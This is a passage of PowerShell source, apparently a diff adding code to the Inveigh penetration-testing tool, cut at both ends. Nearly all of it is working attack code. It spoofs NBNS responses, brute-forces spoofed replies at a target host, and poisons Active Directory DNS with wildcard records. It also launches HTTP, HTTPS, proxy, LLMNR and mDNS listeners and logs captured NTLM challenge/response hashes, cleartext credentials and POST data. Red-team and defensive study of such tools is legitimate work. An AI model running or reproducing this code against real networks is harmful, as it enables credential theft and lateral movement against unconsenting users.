$inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Error starting NBNS spoofer") > $null + $NBNS_running = $false + } + + $NBNS_UDP_client.Client.ReceiveTimeout = 5000 + $NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL) + [Array]::Reverse($NBNS_TTL_bytes) + + while($inveigh.running -and $NBNS_running) + { + + try + { + $NBNS_request_data = $NBNS_UDP_client.Receive([Ref]$NBNS_listener_endpoint) + } + catch + { + $NBNS_UDP_client.Close() + $NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137 + $NBNS_UDP_client.Client.ReceiveTimeout = 5000 + } + + if($NBNS_request_data -and [System.BitConverter]::ToString($NBNS_request_data[10..11]) -ne '00-01') + { + $NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL) + [Array]::Reverse($NBNS_TTL_bytes) + + $NBNS_response_packet = $NBNS_request_data[0,1] + + 0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20 + + $NBNS_request_data[13..$NBNS_request_data.Length] + + $NBNS_TTL_bytes + + 0x00,0x06,0x00,0x00 + + ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() + + 0x00,0x00,0x00,0x00 + + $source_IP = $NBNS_listener_endpoint.Address + $NBNS_query_type = [System.BitConverter]::ToString($NBNS_request_data[43..44]) + $NBNS_query_type = Get-NBNSQueryType $NBNS_query_type + $NBNS_response_type = "[+]" + $NBNS_query = [System.BitConverter]::ToString($NBNS_request_data[13..($NBNS_request_data.Length - 4)]) + $NBNS_query = $NBNS_query -replace "-00","" + $NBNS_query = $NBNS_query.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $NBNS_query_string_encoded = New-Object System.String ($NBNS_query,0,$NBNS_query.Length) + $NBNS_query_string_encoded = $NBNS_query_string_encoded.Substring(0,$NBNS_query_string_encoded.IndexOf("CA")) + $NBNS_query_string_subtracted = $null + $NBNS_query_string = $null + $n = 0 + + do + { + $NBNS_query_string_sub = (([Byte][Char]($NBNS_query_string_encoded.Substring($n,1))) - 65) + $NBNS_query_string_subtracted += ([System.Convert]::ToString($NBNS_query_string_sub,16)) + $n += 1 + } + until($n -ge ($NBNS_query_string_encoded.Length)) + + $n = 0 + + do + { + $NBNS_query_string += ([Char]([System.Convert]::ToInt16($NBNS_query_string_subtracted.Substring($n,2),16))) + $n += 2 + } + until($n -ge ($NBNS_query_string_subtracted.Length) -or $NBNS_query_string.Length -eq 15) + + if($NBNS_query_string -notmatch '[^\x00-\x7F]+') + { + + if(!$inveigh.request_table.ContainsKey($NBNS_query_string)) + { + $inveigh.request_table.Add($NBNS_query_string.ToLower(),[Array]$source_IP.IPAddressToString) + $inveigh.request_table_updated = $true + } + else + { + $inveigh.request_table.$NBNS_query_string += $source_IP.IPAddressToString + $inveigh.request_table_updated = $true + } + + } + + if(!$Inspect -and ($NBNS_request_data -and $NBNS_listener_endpoint.Address.IPAddressToString -ne '255.255.255.255') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $NBNS_query_string) -and ( + !$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $NBNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ( + $inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP) -and ($NBNSTypes -contains $NBNS_query_type) -and ($source_IP -ne $IP) -and ($SpooferNonprintable -eq 'Y' -or ( + $SpooferNonprintable -eq 'N' -and $NBNS_query_string -notmatch '[^\x00-\x7F]+'))) + { + $NBNS_destination_endpoint = New-Object System.Net.IPEndpoint($NBNS_listener_endpoint.Address,137) + $NBNS_UDP_client.Connect($NBNS_destination_endpoint) + $NBNS_UDP_client.Send($NBNS_response_packet,$NBNS_response_packet.Length) + $NBNS_UDP_client.Close() + $NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137 + $NBNS_UDP_client.Client.ReceiveTimeout = 5000 + $NBNS_response_message = "[response sent]" + } + else + { + $NBNS_response_message = Get-SpooferResponseMessage -QueryString $NBNS_query_string -Type "NBNS" + $NBNS_response_type = $NBNS_response_message[0] + $NBNS_response_message = $NBNS_response_message[1] + } + + if($NBNS_request_data) + { + $inveigh.output_queue.Add("$NBNS_response_type [$(Get-Date -format s)] NBNS request $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message") > $null + } + + $NBNS_request_data = $null + } + + } + + $NBNS_UDP_client.Close() + } + +# NBNS BruteForce ScriptBlock +$NBNS_bruteforce_spoofer_scriptblock = +{ + param ($NBNSBruteForceHost,$NBNSBruteForcePause,$NBNSBruteForceTarget,$NBNSTTL,$SpooferIP) + + $NBNSBruteForceHost = $NBNSBruteForceHost.ToUpper() + + $hostname_bytes = 0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41, + 0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x41,0x41,0x00 + + $hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($NBNSBruteForceHost) + $hostname_encoded = [System.BitConverter]::ToString($hostname_encoded) + $hostname_encoded = $hostname_encoded.Replace("-","") + $hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($hostname_encoded) + $NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL) + [Array]::Reverse($NBNS_TTL_bytes) + + for($i=0; $i -lt $hostname_encoded.Count; $i++) + { + + if($hostname_encoded[$i] -gt 64) + { + $hostname_bytes[$i] = $hostname_encoded[$i] + 10 + } + else + { + $hostname_bytes[$i] = $hostname_encoded[$i] + 17 + } + + } + + $NBNS_response_packet = 0x00,0x00,0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20 + + $hostname_bytes + + 0x00,0x20,0x00,0x01 + + $NBNS_TTL_bytes + + 0x00,0x06,0x00,0x00 + + ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() + + 0x00,0x00,0x00,0x00 + + $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Starting NBNS brute force spoofer to resolve $NBNSBruteForceHost on $NBNSBruteForceTarget") > $null + $NBNS_paused = $false + $NBNS_bruteforce_UDP_client = New-Object System.Net.Sockets.UdpClient(137) + $destination_IP = [System.Net.IPAddress]::Parse($NBNSBruteForceTarget) + $destination_point = New-Object Net.IPEndpoint($destination_IP,137) + $NBNS_bruteforce_UDP_client.Connect($destination_point) + + while($inveigh.running) + { + + :NBNS_spoofer_loop while (!$inveigh.hostname_spoof -and $inveigh.running) + { + + if($NBNS_paused) + { + $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Resuming NBNS brute force spoofer") > $null + $NBNS_paused = $false + } + + for ($i = 0; $i -lt 255; $i++) + { + + for ($j = 0; $j -lt 255; $j++) + { + $NBNS_response_packet[0] = $i + $NBNS_response_packet[1] = $j + $NBNS_bruteforce_UDP_client.send($NBNS_response_packet,$NBNS_response_packet.Length) + + if($inveigh.hostname_spoof -and $NBNSBruteForcePause) + { + $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Pausing NBNS brute force spoofer") > $null + $NBNS_paused = $true + break NBNS_spoofer_loop + } + + } + + } + + } + + Start-Sleep -m 5 + } + + $NBNS_bruteforce_UDP_client.Close() +} + +# Control Loop ScriptBlock +$control_scriptblock = +{ + param ($ADIDNSCleanup,[System.Management.Automation.PSCredential]$ADIDNSCredential,$ADIDNSDomain, + $ADIDNSDomainController,$ADIDNSForest,$ADIDNSHostsIgnore,$ADIDNSPartition,$ADIDNSThreshold,$ADIDNSTTL, + $ADIDNSZone,$ConsoleQueueLimit,$NBNSBruteForcePause,$RunCount,$RunTime,$SpooferIP) + + function Invoke-OutputQueueLoop + { + + while($inveigh.output_queue.Count -gt 0) + { + $inveigh.console_queue.Add($inveigh.output_queue[0]) > $null + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add($inveigh.output_queue[0]) > $null + } + + if($inveigh.log_output) + { + $inveigh.log.Add($inveigh.output_queue[0]) > $null + } + + $inveigh.output_queue.RemoveAt(0) + } + + } + + function Stop-InveighRunspace + { + param ([String]$Message) + + if($inveigh.HTTPS -and !$inveigh.HTTPS_existing_certificate -or ($inveigh.HTTPS_existing_certificate -and $inveigh.HTTPS_force_certificate_delete)) + { + + try + { + $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine") + $certificate_store.Open('ReadWrite') + $certificates = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -Like "CN=" + $inveigh.certificate_issuer}) + + foreach($certificate in $certificates) + { + $certificate_store.Remove($certificate) + } + + $certificate_store.Close() + } + catch + { + $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] SSL Certificate Deletion Error [Remove Manually]") > $null + } + + } + + if($ADIDNSCleanup -eq 'Y' -and $inveigh.ADIDNS -eq 'Wildcard') + { + + try + { + Disable-ADIDNSNode -Credential $ADIDNSCredential -Domain $ADIDNSDomain -DomainController $ADIDNSDomainController -Node '*' -Partition $ADIDNSPartition -Zone $ADIDNSZone + } + catch + { + $error_message = $_.Exception.Message + $error_message = $error_message -replace "`n","" + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message $($_.InvocationInfo.Line.Trim())") > $null + } + + } + + if($ADIDNSCleanup -eq 'Y' -and $inveigh.ADIDNS -eq 'Combo' -and $inveigh.ADIDNS_table.Count -gt 0) + { + $ADIDNS_table_keys_temp = $inveigh.ADIDNS_table.Keys + + foreach($ADIDNS_host in $ADIDNS_table_keys_temp) + { + + if($inveigh.ADIDNS_table.$ADIDNS_host -eq 1) + { + + try + { + Disable-ADIDNSNode -Credential $ADIDNSCredential -Domain $ADIDNSDomain -DomainController $ADIDNSDomainController -Node $ADIDNS_host -Partition $ADIDNSPartition -Zone $ADIDNSZone + $inveigh.ADIDNS_table.$ADIDNS_host = $null + } + catch + { + $error_message = $_.Exception.Message + $error_message = $error_message -replace "`n","" + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message $($_.InvocationInfo.Line.Trim())") > $null + $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] ADIDNS host (A) record for $ADIDNS_host remove failed") > $null + } + + } + + } + + } + + if($inveigh.relay_running) + { + Start-Sleep -m 100 + + if($Message) + { + $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Inveigh Relay is exiting due to $Message") > $null + } + else + { + $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Inveigh Relay is exiting") > $null + } + + if(!$inveigh.running) + { + Invoke-OutputQueueLoop + Start-Sleep -m 100 + } + + $inveigh.relay_running = $false + } + + if($inveigh.running) + { + Start-Sleep -m 100 + + if($Message) + { + $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Inveigh is exiting due to $Message") > $null + } + else + { + $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Inveigh is exiting") > $null + } + + Invoke-OutputQueueLoop + Start-Sleep -m 100 + $inveigh.running = $false + } + + $inveigh.HTTPS = $false + } + + if($inveigh.ADIDNS -eq 'Wildcard') + { + Invoke-ADIDNSSpoofer -Credential $ADIDNSCredential -Data $SpooferIP -Domain $ADIDNSDomain -DomainController $ADIDNSDomainController -Forest $ADIDNSForest -Node '*' -Partition $ADIDNSPartition -TTL $ADIDNSTTL -Zone $ADIDNSZone + } + + if($NBNSBruteForcePause) + { + $NBNS_pause = New-TimeSpan -Seconds $NBNSBruteForcePause + } + + $run_count_NTLMv1 = $RunCount + $inveigh.NTLMv1_list.Count + $run_count_NTLMv2 = $RunCount + $inveigh.NTLMv2_list.Count + $run_count_cleartext = $RunCount + $inveigh.cleartext_list.Count + + if($RunTime) + { + $control_timeout = New-TimeSpan -Minutes $RunTime + $control_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() + } + + while($inveigh.running) + { + + if($NBNSBruteForcePause -and $inveigh.hostname_spoof) + { + + if($inveigh.NBNS_stopwatch.Elapsed -ge $NBNS_pause) + { + $inveigh.hostname_spoof = $false + } + + } + + if($RunCount) + { + + if($inveigh.NTLMv1_list.Count -ge $run_count_NTLMv1 -or $inveigh.NTLMv2_list.Count -ge $run_count_NTLMv2 -or $inveigh.cleartext_list.Count -ge $run_count_cleartext) + { + Stop-InveighRunspace "reaching run count" + } + + } + + if($RunTime) + { + + if($control_stopwatch.Elapsed -ge $control_timeout) + { + Stop-InveighRunspace "reaching run time" + } + + } + + if($inveigh.ADIDNS -eq 'Combo' -and $inveigh.request_table_updated) + { + + try + { + Invoke-ADIDNSCheck -Credential $ADIDNSCredential -Data $SpooferIP -Domain $ADIDNSDomain -DomainController $ADIDNSDomainController -Forest $ADIDNSForest -Ignore $ADIDNSHostsIgnore -Partition $ADIDNSPartition -RequestTable $inveigh.request_table -Threshold $ADIDNSThreshold -TTL $ADIDNSTTL -Zone $ADIDNSZone + } + catch + { + $error_message = $_.Exception.Message + $error_message = $error_message -replace "`n","" + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message $($_.InvocationInfo.Line.Trim())") > $null + } + + $inveigh.request_table_updated = $false + } + + if($inveigh.file_output) + { + + while($inveigh.log_file_queue.Count -gt 0) + { + $inveigh.log_file_queue[0]|Out-File $inveigh.log_out_file -Append + $inveigh.log_file_queue.RemoveAt(0) + } + + while($inveigh.NTLMv1_file_queue.Count -gt 0) + { + $inveigh.NTLMv1_file_queue[0]|Out-File $inveigh.NTLMv1_out_file -Append + $inveigh.NTLMv1_file_queue.RemoveAt(0) + } + + while($inveigh.NTLMv2_file_queue.Count -gt 0) + { + $inveigh.NTLMv2_file_queue[0]|Out-File $inveigh.NTLMv2_out_file -Append + $inveigh.NTLMv2_file_queue.RemoveAt(0) + } + + while($inveigh.cleartext_file_queue.Count -gt 0) + { + $inveigh.cleartext_file_queue[0]|Out-File $inveigh.cleartext_out_file -Append + $inveigh.cleartext_file_queue.RemoveAt(0) + } + + while($inveigh.POST_request_file_queue.Count -gt 0) + { + $inveigh.POST_request_file_queue[0]|Out-File $inveigh.POST_request_out_file -Append + $inveigh.POST_request_file_queue.RemoveAt(0) + } + + } + + if(!$inveigh.console_output -and $ConsoleQueueLimit -ge 0) + { + + while($inveigh.console_queue.Count -gt $ConsoleQueueLimit -and !$inveigh.console_output) + { + $inveigh.console_queue.RemoveAt(0) + } + + } + + if(!$inveigh.status_output) + { + Invoke-OutputQueueLoop + } + + Start-Sleep -m 5 + + if($inveigh.stop) + { + $inveigh.console_queue.Clear() + Stop-InveighRunspace + Start-Sleep -S 1 + } + + } + +} + +#endregion +#region begin startup functions + +# HTTP Listener Startup Function +function HTTPListener +{ + $proxy_listener = $false + $HTTPS_listener = $false + $HTTP_runspace = [RunspaceFactory]::CreateRunspace() + $HTTP_runspace.Open() + $HTTP_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) + $HTTP_powershell = [PowerShell]::Create() + $HTTP_powershell.Runspace = $HTTP_runspace + $HTTP_powershell.AddScript($shared_basic_functions_scriptblock) > $null + $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument( + $HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($HTTPIP).AddArgument($HTTPPort).AddArgument( + $HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument( + $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument( + $Proxy).AddArgument($ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument( + $WPADAuthIgnore).AddArgument($WPADResponse) > $null + $HTTP_powershell.BeginInvoke() > $null +} + +Start-Sleep -m 50 + +# HTTPS Listener Startup Function +function HTTPSListener +{ + $proxy_listener = $false + $HTTPS_listener = $true + $HTTPS_runspace = [RunspaceFactory]::CreateRunspace() + $HTTPS_runspace.Open() + $HTTPS_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) + $HTTPS_powershell = [PowerShell]::Create() + $HTTPS_powershell.Runspace = $HTTPS_runspace + $HTTPS_powershell.AddScript($shared_basic_functions_scriptblock) > $null + $HTTPS_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument( + $HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($HTTPIP).AddArgument($HTTPSPort).AddArgument( + $HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument( + $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument( + $Proxy).AddArgument($ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument( + $WPADAuthIgnore).AddArgument($WPADResponse) > $null + $HTTPS_powershell.BeginInvoke() > $null +} + +Start-Sleep -m 50 + +# Proxy Listener Startup Function +function ProxyListener +{ + $proxy_listener = $true + $HTTPS_listener = $false + $proxy_runspace = [RunspaceFactory]::CreateRunspace() + $proxy_runspace.Open() + $proxy_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) + $proxy_powershell = [PowerShell]::Create() + $proxy_powershell.Runspace = $proxy_runspace + $proxy_powershell.AddScript($shared_basic_functions_scriptblock) > $null + $proxy_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument( + $HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($ProxyIP).AddArgument($ProxyPort).AddArgument( + $HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument( + $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument( + $Proxy).AddArgument($ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument( + $WPADAuthIgnore).AddArgument($WPADResponse) > $null + $proxy_powershell.BeginInvoke() > $null +} + +# Sniffer/Spoofer Startup Function +function SnifferSpoofer +{ + $sniffer_runspace = [RunspaceFactory]::CreateRunspace() + $sniffer_runspace.Open() + $sniffer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) + $sniffer_powershell = [PowerShell]::Create() + $sniffer_powershell.Runspace = $sniffer_runspace + $sniffer_powershell.AddScript($shared_basic_functions_scriptblock) > $null + $sniffer_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null + $sniffer_powershell.AddScript($sniffer_scriptblock).AddArgument($EvadeRG).AddArgument($IP).AddArgument( + $LLMNR).AddArgument($LLMNR_response_message).AddArgument($LLMNRTTL).AddArgument($mDNS).AddArgument( + $mDNS_response_message).AddArgument($mDNSTypes).AddArgument($mDNSTTL).AddArgument( + $NBNS).AddArgument($NBNS_response_message).AddArgument($NBNSTTL).AddArgument($NBNSTypes).AddArgument( + $SMB).AddArgument($SpooferHostsIgnore).AddArgument($SpooferHostsReply).AddArgument( + $SpooferIP).AddArgument($SpooferIPsIgnore).AddArgument($SpooferIPsReply).AddArgument( + $SpooferLearning).AddArgument($SpooferLearningDelay).AddArgument($SpooferLearningInterval).AddArgument( + $SpooferNonprintable).AddArgument($SpooferThresholdHost).AddArgument($SpooferThresholdNetwork) > $null + $sniffer_powershell.BeginInvoke() > $null +} + +# Unprivileged LLMNR Spoofer Startup Function +function LLMNRSpoofer +{ + $LLMNR_spoofer_runspace = [RunspaceFactory]::CreateRunspace() + $LLMNR_spoofer_runspace.Open() + $LLMNR_spoofer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) + $LLMNR_spoofer_powershell = [PowerShell]::Create() + $LLMNR_spoofer_powershell.Runspace = $LLMNR_spoofer_runspace + $LLMNR_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null + $LLMNR_spoofer_powershell.AddScript($LLMNR_spoofer_scriptblock).AddArgument($Inspect).AddArgument( + $LLMNR_response_message).AddArgument($SpooferIP).AddArgument($SpooferHostsReply).AddArgument( + $SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument($SpooferIPsIgnore).AddArgument( + $SpooferNonprintable).AddArgument($LLMNRTTL) > $null + $LLMNR_spoofer_powershell.BeginInvoke() > $null +} + +# Unprivileged mDNS Spoofer Startup Function +function mDNSSpoofer +{ + $mDNS_spoofer_runspace = [RunspaceFactory]::CreateRunspace() + $mDNS_spoofer_runspace.Open() + $mDNS_spoofer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) + $mDNS_spoofer_powershell = [PowerShell]::Create() + $mDNS_spoofer_powershell.Runspace = $mDNS_spoofer_runspace + $mDNS_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null + $mDNS_spoofer_powershell.AddScript($mDNS_spoofer_scriptblock).AddArgument($Inspect).AddArgument( + $mDNS_response_message).AddArgument($mDNSTTL).AddArgument($mDNSTypes).AddArgument($SpooferIP).AddArgument( + $SpooferHostsReply).AddArgument($SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument( + $SpooferIPsIgnore) > $null + $mDNS_spoofer_powershell.BeginInvoke() > $null +} + +# Unprivileged NBNS Spoofer Startup Function +function NBNSSpoofer +{ + $NBNS_spoofer_runspace = [RunspaceFactory]::CreateRunspace() + $NBNS_spoofer_runspace.Open() + $NBNS_spoofer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) + $NBNS_spoofer_powershell = [PowerShell]::Create() + $NBNS_spoofer_powershell.Runspace = $NBNS_spoofer_runspace + $NBNS_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null + $NBNS_spoofer_powershell.AddScript($NBNS_spoofer_scriptblock).AddArgument($Inspect).AddArgument( + $IP).AddArgument($NBNS_response_message).AddArgument($NBNSTTL).AddArgument($NBNSTypes).AddArgument( + $SpooferIP).AddArgument($SpooferHostsIgnore).AddArgument($SpooferHostsReply).AddArgument( + $SpooferIPsIgnore).AddArgument($SpooferIPsReply).AddArgument($SpooferNonprintable) > $null + $NBNS_spoofer_powershell.BeginInvoke() > $null +} + +# NBNS Brute Force Spoofer Startup Function +function NBNSBruteForceSpoofer +{ + $NBNS_bruteforce_spoofer_runspace = [RunspaceFactory]::CreateRunspace() + $NBNS_bruteforce_spoofer_runspace.Open() + $NBNS_bruteforce_spoofer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) + $NBNS_bruteforce_spoofer_powershell = [PowerShell]::Create() + $NBNS_bruteforce_spoofer_powershell.Runspace = $NBNS_bruteforce_spoofer_runspace + $NBNS_bruteforce_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null + $NBNS_bruteforce_spoofer_powershell.AddScript($NBNS_bruteforce_spoofer_scriptblock).AddArgument( + $NBNSBruteForceHost).AddArgument($NBNSBruteForcePause).AddArgument($NBNSBruteForceTarget).AddArgument( + $NBNSTTL).AddArgument($SpooferIP) > $null + $NBNS_bruteforce_spoofer_powershell.BeginInvoke() > $null +} + +# Control Loop Startup Function +function ControlLoop +{ + $control_runspace = [RunspaceFactory]::CreateRunspace() + $control_runspace.Open() + $control_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) + $control_powershell = [PowerShell]::Create() + $control_powershell.Runspace = $control_runspace + $control_powershell.AddScript($shared_basic_functions_scriptblock) > $null + $control_powershell.AddScript($ADIDNS_functions_scriptblock) > $null + $control_powershell.AddScript($control_scriptblock).AddArgument($ADIDNSCleanup).AddArgument( + $ADIDNSCredential).AddArgument($ADIDNSDomain).AddArgument($ADIDNSDomainController).AddArgument( + $ADIDNSForest).AddArgument($ADIDNSHostsIgnore).AddArgument($ADIDNSPartition).AddArgument( + $ADIDNSThreshold).AddArgument($ADIDNSTTL).AddArgument($ADIDNSZone).AddArgument( + $ConsoleQueueLimit).AddArgument($NBNSBruteForcePause).AddArgument($RunCount).AddArgument( + $RunTime).AddArgument($SpooferIP) > $null + $control_powershell.BeginInvoke() > $null +} + +#endregion +#region begin startup enabled services + +# HTTP Server Start +if($HTTP -eq 'Y') +{ + HTTPListener +} + +# HTTPS Server Start +if($HTTPS -eq 'Y') +{ + HTTPSListener +} + +# Proxy Server Start +if($Proxy -eq 'Y') +{ + ProxyListener +} + +# Sniffer/Spoofer Start +if(($LLMNR -eq 'Y' -or $mDNS -eq 'Y' -or $NBNS -eq 'Y' -or $SMB -eq 'Y' -or $Inspect) -and $elevated_privilege) +{ + SnifferSpoofer +} +elseif(($LLMNR -eq 'Y' -or $mDNS -eq 'Y' -or $NBNS -eq 'Y' -or $SMB -eq 'Y') -and !$elevated_privilege) +{ + + if($LLMNR -eq 'Y') + { + LLMNRSpoofer + } + + if($mDNS -eq 'Y') + { + mDNSSpoofer + } + + if($NBNS -eq 'Y') + { + NBNSSpoofer + } + + if($NBNSBruteForce -eq 'Y') + { + NBNSBruteForceSpoofer + } + +} + +# NBNSBruteForce Spoofer Start +if($NBNSBruteForce -eq 'Y') +{ + NBNSBruteForceSpoofer +} + +# Control Loop Start +ControlLoop + +# Console Output Loop +try +{ + + if($inveigh.console_output) + { + + if($ConsoleStatus) + { + $console_status_timeout = New-TimeSpan -Minutes $ConsoleStatus + $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() + } + + :console_loop while(($inveigh.running -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output)) + { + + while($inveigh.console_queue.Count -gt 0) + { + + switch -wildcard ($inveigh.console_queue[0]) + { + + {$_ -like "?`[`!`]*" -or $_ -like "?`[-`]*"} + { + + if($inveigh.output_stream_only) + { + Write-Output($inveigh.console_queue[0] + $inveigh.newline) + } + else + { + Write-Warning($inveigh.console_queue[0]) + } + + $inveigh.console_queue.RemoveAt(0) + } + + {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent received *"} + { + + if($ConsoleOutput -eq 'Y') + { + + if($inveigh.output_stream_only) + { + Write-Output($inveigh.console_queue[0] + $inveigh.newline) + } + else + { + Write-Output($inveigh.console_queue[0]) + } + + } + + $inveigh.console_queue.RemoveAt(0) + } + + {$_ -like "* response sent" -or $_ -like "* ignoring *" -or $_ -like "* HTTP*request for *" -or $_ -like "* Proxy request for *"} + { + + if($ConsoleOutput -ne "Low") + { + + if($inveigh.output_stream_only) + { + Write-Output($inveigh.console_queue[0] + $inveigh.newline) + } + else + { + Write-Output($inveigh.console_queue[0]) + } + + } + + $inveigh.console_queue.RemoveAt(0) + + } + + default + { + + if($inveigh.output_stream_only) + { + Write-Output($inveigh.console_queue[0] + $inveigh.newline) + } + else + { + Write-Output($inveigh.console_queue[0]) + } + + $inveigh.console_queue.RemoveAt(0) + } + + } + + } + + if($ConsoleStatus -and $console_status_stopwatch.Elapsed -ge $console_status_timeout) + { + + if($inveigh.cleartext_list.Count -gt 0) + { + Write-Output("[*] [$(Get-Date -format s)] Current unique cleartext captures:" + $inveigh.newline) + $inveigh.cleartext_list.Sort() + $cleartext_list_temp = $inveigh.cleartext_list + + foreach($unique_cleartext in $cleartext_list_temp) + { + + if($unique_cleartext -ne $unique_cleartext_last) + { + Write-Output($unique_cleartext + $inveigh.newline) + } + + $unique_cleartext_last = $unique_cleartext + } + + Start-Sleep -m 5 + } + else + { + Write-Output("[+] [$(Get-Date -format s)] No cleartext credentials have been captured" + $inveigh.newline) + } + + if($inveigh.POST_request_list.Count -gt 0) + { + Write-Output("[*] [$(Get-Date -format s)] Current unique POST request captures:" + $inveigh.newline) + $inveigh.POST_request_list.Sort() + $POST_request_list_temp = $inveigh.POST_request_list + + foreach($unique_POST_request in $POST_request_list_temp) + { + + if($unique_POST_request -ne $unique_POST_request_last) + { + Write-Output($unique_POST_request + $inveigh.newline) + } + + $unique_POST_request_last = $unique_POST_request + } + + Start-Sleep -m 5 + } + + if($inveigh.NTLMv1_list.Count -gt 0) + { + Write-Output("[*] [$(Get-Date -format s)] Current unique NTLMv1 challenge/response captures:" + $inveigh.newline) + $inveigh.NTLMv1_list.Sort() + $NTLMv1_list_temp = $inveigh.NTLMv1_list + + foreach($unique_NTLMv1 in $NTLMv1_list_temp) + { + $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2))) + + if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last) + { + Write-Output($unique_NTLMv1 + $inveigh.newline) + } + + $unique_NTLMv1_account_last = $unique_NTLMv1_account + } + + $unique_NTLMv1_account_last = '' + Start-Sleep -m 5 + Write-Output("[*] [$(Get-Date -format s)] Current NTLMv1 IP addresses and usernames:" + $inveigh.newline) + $NTLMv1_username_list_temp = $inveigh.NTLMv1_username_list + + foreach($NTLMv1_username in $NTLMv1_username_list_temp) + { + Write-Output($NTLMv1_username + $inveigh.newline) + } + + Start-Sleep -m 5 + } + else + { + Write-Output("[+] [$(Get-Date -format s)] No NTLMv1 challenge/response hashes have been captured" + $inveigh.newline) + } + + if($inveigh.NTLMv2_list.Count -gt 0) + { + Write-Output("[*] [$(Get-Date -format s)] Current unique NTLMv2 challenge/response captures:" + $inveigh.newline) + $inveigh.NTLMv2_list.Sort() + $NTLMv2_list_temp = $inveigh.NTLMv2_list + + foreach($unique_NTLMv2 in $NTLMv2_list_temp) + { + $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2))) + + if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last) + { + Write-Output($unique_NTLMv2 + $inveigh.newline) + } + + $unique_NTLMv2_account_last = $unique_NTLMv2_account + } + + $unique_NTLMv2_account_last = '' + Start-Sleep -m 5 + Write-Output("[*] [$(Get-Date -format s)] Current NTLMv2 IP addresses and usernames:" + $inveigh.newline) + 